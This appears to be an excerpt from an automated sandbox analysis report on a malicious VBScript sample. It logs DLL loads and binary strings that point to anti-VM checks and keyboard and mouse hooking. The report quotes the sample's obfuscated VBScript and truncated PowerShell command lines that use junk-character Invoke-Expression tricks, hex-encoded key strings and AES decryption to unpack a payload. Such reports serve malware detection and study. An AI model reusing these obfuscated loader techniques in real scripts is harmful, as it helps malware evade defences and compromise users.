                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: test.vbsStatic file information: File size 1324656 > 1048576
                      Source: Binary string: C:\Users\swagkek\source\repos\AntiVM\obj\Release\abc.pdb source: powershell.exe, 00000005.00000002.1372476794.0000027F80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F804DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1392320209.0000027FFEAD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/gma.system.mousekeyhook]costura.gma.system.mousekeyhook.dll.compressed source: powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\projects\globalmousekeyhook\MouseKeyHook\obj\Debug\Gma.System.MouseKeyHook.pdb source: powershell.exe, 00000008.00000002.2815168012.0000022560390000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: costura.costura.pdb.compressed source: powershell.exe, 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256 source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      VBScript performs obfuscated calls to suspicious functions
                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript) Then:QyRjCF9 = u73C8f8("05372A7A625E55"):IbQieBF CkqJQ5b, u73C8f8("02222B2231060A1A63770F7A402F3B63353A321B075826202C"),0,true:Do:OjmX2HP = 6:Loop:Else:WScript.Quit:End If:For C0CIO3w = 2 To 8:iJ3a4xQ = C0CIO3w + 70:Next:End If:For IT1NO2a = 5 To 12:iast6gt = IT1NO2a + 8:Next:Qm3HFSZ = "BJsIr6aJgm/MYyy0jx/dYtXUKX33378pZkXRUR+Yir31m2+YbF77xL2CW6W5cgMH28Z52QOVo1XZBNSDncD2ONznPy+Ic9DS4G2J5/zg4Fw2N4FYtWK/oi9BY4sCJf4rXvmUpXpEDuZDs7EUB2rzcVTKV1T1pj6J3iAZX5yPQwm9sww+N7RTbh+CldYF5BkOGOEQ4hXQ1db7rJaw4Fo83hT9JiWSbEZmlkOcVyPORCHoHA/XmtDHT97IBMJ2J3KMabdEFWyQ/XAYkO9J32oHM0WnVsXzssfWTn+Yas6lEsJ1xPR0nVrJgndOeJtqlQ1yIXyhT5FTQan3Vx7D4jarAihOXWSE4SXScoVe9kDcdTuWcfvG6uiOqi/VIHGd9RTM+n9erTpdYIUzHbyqtor1+xlPw6hb4iQq7uFCzLO+kfI8lLDmL8joN/QuDuZEJp2jryDAy7Z+ru/M1Akm7lEIgVdxvwkfKzo5nTv+Qg/XHHiP5iIgKK03lHnqxjTxxS4b8C43FOxQgA3t8pj9rjmGfs5jmRqIZWnNlO7UnqrdJYChXb1Usd18r/0ZP2pZvlUuNeUt5183/VqCF9UIBx3MhT4AEkOwfIJhflM173P/6uv+r1WZsRNOvGOW/7P1x8T1rURPr5YjNLsflDAY7JWnfU/F6mIMgy0+VSPbMc3ccTCdQviXkuxBMwxcFcV622c5XJTdCxPWnysqJrPhUjlEvQ68vRh7EOaRgiawinUd9+wXo30jsaU/i9c4eAsf17wdyeqww+4QiKQNLOkj4bqb+tfMZCsgiW9iS3U/M5/ukx1MCTDi/Kp878HeGFfNwT+W4Fdz5DnzNOuAdvpCSU5O571p/Q68bwx6r3rBEDDILxsTq3QJVYwQqSpz8ESd26CH/zzVU5xaGcLEjTevNEAebEh9qOD40GtjtWpN6cA/2poY8Wv+G/5HqZDNwqt77USkvivBNnPRTo7eRBmpon5WNnHXpl1FSJGim5lXPRvXHQwrnAtlOCq2wItkvvUro06kaV9jsldh8kypn1G7CYBSQODfIJwKTU+VONFrDi00xOcRO15tdQeIWNJHQzD+h8+igFBHO+7nVrzasE7ZQvf63exxgW4FPKgFzHeo6kjOuEXK6b0cUmyGRMU0Cm+b+lwj41fgp5CLe4zzKP69G3LzJqHpND0qzEGgKY8pIXN82sSLJ2VX" &_"C4hOBPs54B0IYdn2ev1IpRQlq/dvQRJUefiC5JbEb4Hkxr31dcfbRUtraR7I7PHAUJskdmFdnJfGeq69bHbeQkL4AZ4tKSLcI4CEbky1cjnWC5KAHwS24eqrYP+K7yzApre9YwZ380Bq24VfGMB+2xxCf5x2VHXSCazf7v0RWZEpqLwBjjozbnbTkPLAoDw/U45hYo3CI38eDBY0eAC2GlpZYBDLjbFUvXW1R9WbFuy+lV/+YmeOG8T+YGeghIBG+pzgl7X5+5qkaEXVTnvCS2CsZAcD8g6GpATwrgNtxT6Bl13iIhVppAz+EztOTlZeFpUKAYPEWM6YXq4eXBw08tdTevSzW0CrhdmpThwpWtZ6Uw3XWHvzlejYDS0aQJO5oCUawxD74pgHicicvDKeIG3/UJKCl8i489DYbzleS1PRff1TyWUsjknp7+hLY8z2m+tFvaPc2/foVUj9yjVwsQO17dFGvTXEUR1DEkDvgFMrpk4R9ETkYU1Fy1UfULTFOvqI0N/Wui58g9iWxjMzygyw0t1jGOBOIPSeKXnQ9mYl1WkOPGbXLLQP3DVaFRugLrrbSQtjf/guwnD8gh2oIlNi2Kf+cd6BCPQxL5QlT3Shj6zt5rWXSq1pGm3rLkq4H1kw9kB1xid84o+3KvW06vMUAoMyFg8AJaZG4NO1SPbYuDS6v0hW0p4WMmcWxCOtEuQMRED3kpvw4OxsUo4sy07E7faB6jD4taCLsz+m4DUCpzlkWts6UJkLg/KNAVaPAvyrQmCX/8mgn04IWuoqkp1l4mUI0beOA7irLHYZFTwQJrsTsw+RmXAwFowkbTA1PjdlmFZAcxCs+FnVeiKy4m7DaBch6AMmw43WJVj1mp5md6jqL5vTukuPPoGlPWqoocKMVNHNI/R1FnMJV/CERMePMVOWHbTKe44hOFcOtpUKPNaW3XjgvJMgfl9ap4Bq12tfKn7gI02AVG5sVRapghVI/mJpINA2zdZwT8zIs/ksHfGJrFUEWBdj5HJa+3UAwV+24ORBe9I6T5kXApMlg1YTGA9vmL5U2pxJdw6xVtiFpcbOLzRujq2f9PHS/JDkjom+yONTkmIoppeT/azOrF9iJHUskfhk6Y65k0oojB/7JmNcBkAhAl3S0CmQmDT+5SH1XTcGBYgXhFkEJWY/ZHArBinEItKqi2uZZ6FLbPk6V/4i" &_"gvtyWhS6f/yLuZQGPPG3Kyk9AAK7wINlylZ4OJk4pM+4Rojn/lsl/n39U18n5SxEEQ42VNrlWAiW3wwIRECFoAhd+ZL//WtpgKKLFNn3eYoJtA7Kk7uHy8udJuRHz+rAF3f0GCXU3GOKHrnWuMGXETtyOeLJj10B5vDoBTNtohhjKvWV+R0XwpS35cbPg54bf+tpdEJROx3Qd8biObLuWfZibJaduCUwRuNLmYJFnQyN1F/8Dytkt4AS41I87pmgd6v+PGZRBcq2Ae/7uDMX5Z9aSQM6RazbMWy9d
                      .NET source code contains potential unpacker
                      Source: 8.2.powershell.exe.22557d09b78.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 8.2.powershell.exe.22557d09b78.5.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 8.2.powershell.exe.22557d09b78.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 8.2.powershell.exe.22557d09b78.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 8.2.powershell.exe.22557d09b78.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 8.2.powershell.exe.22557d59bb0.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 8.2.powershell.exe.22557d59bb0.4.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 8.2.powershell.exe.22557d59bb0.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 8.2.powershell.exe.22557d59bb0.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 8.2.powershell.exe.22557d59bb0.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Suspicious powershell command line found
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mr
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function Ib6pi([byte[]]$Sf4DZ) {Invoke-Expression -Verbose -WarningAction Inquire -Debug 'O2o$O2ocO2oqO2o1O2oaO2oGO2o=O2o[O2oSO2oyO2osO2otO2oeO2omO2o.O2oTO2oeO2oxO2otO2o.O2oEO2onO2ocO2ooO2odO2oiO2onO2ogO2o]O2o:O2o:O2oUO2oTO2oFO2o8O2o.O2oGO2oeO2otO2oSO2otO2orO2oiO2onO2ogO2o(O2o$O2oSO2ofO2o4O2oDO2oZO2o)O2o'.Replace('O2o', ''); return $cq1aG; } function Smsgn([byte[]]$TYS1W) {Invoke-Expression -Verbose -InformationAction Ignore 'StI$StIrStIwStIZStIwStIHStI=StI[StIBStIiStItStICStIoStInStIvStIeStIrStItStIeStIrStI]StI:StI:StITStIoStIIStInStItStI3StI2StI(StI$StITStIYStISStI1StIWStI,StI0StI)StI;StI'.Replace('StI', ''); return $rwZwH; } $yOU0b = Ib6pi(0x74<#chvvk#>,0x52<#u2CEY#>,0x6B<#MVTFN#>,0x58<#YiCr7#>,0x43<#K8mg9#>,0x36<#UhqQ4#>,0x6A<#cQm2O#>,0x2B<#flcxM#>,0x34<#OY2RT#>,0x5A<#ALzz6#>,0x6F<#zoKd3#>,0x52<#d4OvL#>,0x59<#SLwJ0#>,0x62<#zsa1m#>,0x79<#sFOep#>,0x47<#qGVN9#>,0x70<#Ks1U4#>,0x6F<#uGJ9p#>,0x4D<#kWql0#>,0x45<#EmsaU#>,0x75<#Ov8NF#>,0x6B<#uZpyF#>,0x6B<#XiBw9#>,0x43<#hUbO7#>,0x59<#ujaL4#>,0x46<#ZYnnj#>,0x42<#JY42r#>,0x51<#WtnPA#>,0x34<#YaV4N#>,0x2F<#HV4mN#>,0x46<#nKdcb#>,0x79<#lUwSl#>,0x64<#awCO3#>,0x34<#CnIFi#>,0x58<#uqMOd#>,0x4F<#YNg7w#>,0x4B<#HeBay#>,0x4E<#A4cb9#>,0x58<#F6Vnf#>,0x78<#kXGAK#>,0x2B<#ZMzDT#>,0x45<#E8P88#>,0x67<#Zyzgc#>,0x3D<#Auma2#>); $pKdS6 = Ib6pi(0x4E<#HLrGc#>,0x47<#xVisw#>,0x30<#EHfxR#>,0x52<#wp7Gt#>,0x63<#Cpdce#>,0x50<#OHyLe#>,0x37<#xvqHB#>,0x49<#PetlW#>,0x36<#lZgM3#>,0x7A<#TTBOg#>,0x75<#Rxgr0#>,0x45<#YsPlK#>,0x65<#qhXNz#>,0x65<#QaXw9#>,0x6F<#W6Vt9#>,0x32<#gIQiG#>,0x46<#yGjpJ#>,0x6F<#HP9Ri#>,0x77<#dPHbh#>,0x72<#KCTWk#>,0x34<#x6PPE#>,0x51<#VbwrN#>,0x3D<#RcqfM#>,0x3D<#l7sEq#>); $mxwaP = Ib6pi(0x53<#DbFNZ#>,0x6F<#Jy4Lx#>,0x66<#ez47J#>,0x74<#B1Uku#>,0x77<#kcRDO#>,0x61<#GimOz#>,0x72<#MUPpg#>,0x65<#a0Bz2#>,0x5C<#ehl3n#>,0x4D<#ZitVL#>,0x69<#smHT8#>,0x63<#fJC9S#>,0x72<#hMqWi#>,0x6F<#NkObo#>,0x73<#IzfrK#>,0x6F<#J1Yat#>,0x66<#dzRC7#>,0x74<#fM5r5#>,0x5C<#RyBgP#>,0x57<#T0PUW#>,0x69<#vTRqA#>,0x6E<#BHZJx#>,0x64<#mvlQt#>,0x6F<#p5nY6#>,0x77<#DohgT#>,0x73<#Sx8cw#>); $RGohu = Ib6pi(0x6B<#QlDDy#>,0x70<#NhkB5#>,0x44<#Zww3K#>,0x53<#eNvxb#>,0x46<#XM0XT#>); $RwltO = Smsgn(0x00<#h5SFV#>,0x00<#ucupc#>,0x00<#MID9v#>,0x00<#HXOXF#>); $ewoV8 = $true; $jOK5y = $null; function Yz1Gd($VHgBC) {Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore 'CKA$CKAeCKAyCKAyCKAQCKAHCKA=CKA[CKASCKAyCKAsCKAtCKAeCKAmCKA.CKASCKAeCKAcCKAuCKArCKAiCKAtCKAyCKA.CKACCKArCKAyCKApCKAtCKAoCKAgCKArCKAaCKApCKAhCKAyCKA.CKAACKAeCKAsCKA]CKA:CKA:CKACCKArCKAeCKAaCKAtCKAeCKA(CKA)CKA'.Replace('CKA', ''); Invoke-Expression -WarningAction Inquire -Verbose 'RHv$RHveRHvyRHvyRHvQRHvHRHv.RHvMRHvoRHvdRHveRHv=RHv[RHvSRHvyRHvsRHvtRHveRHvmRHv.RHvSRHveRHvcRHvuRHvrRHviRHvtRHvyRHv.RHvCRHvrRHvyRHvpRHvtRHvoRHvgRHvrRHvaRHvpRHvhRHvyRHv.RHvCRHviRHvpRHvhRHveRHvrRHvMRHvoRHvdRHveRHv]RHv:RHv:RHvCRHvBRHvCRHv'.Replace('RHv', ''); Invoke-Expression -Verbose -D
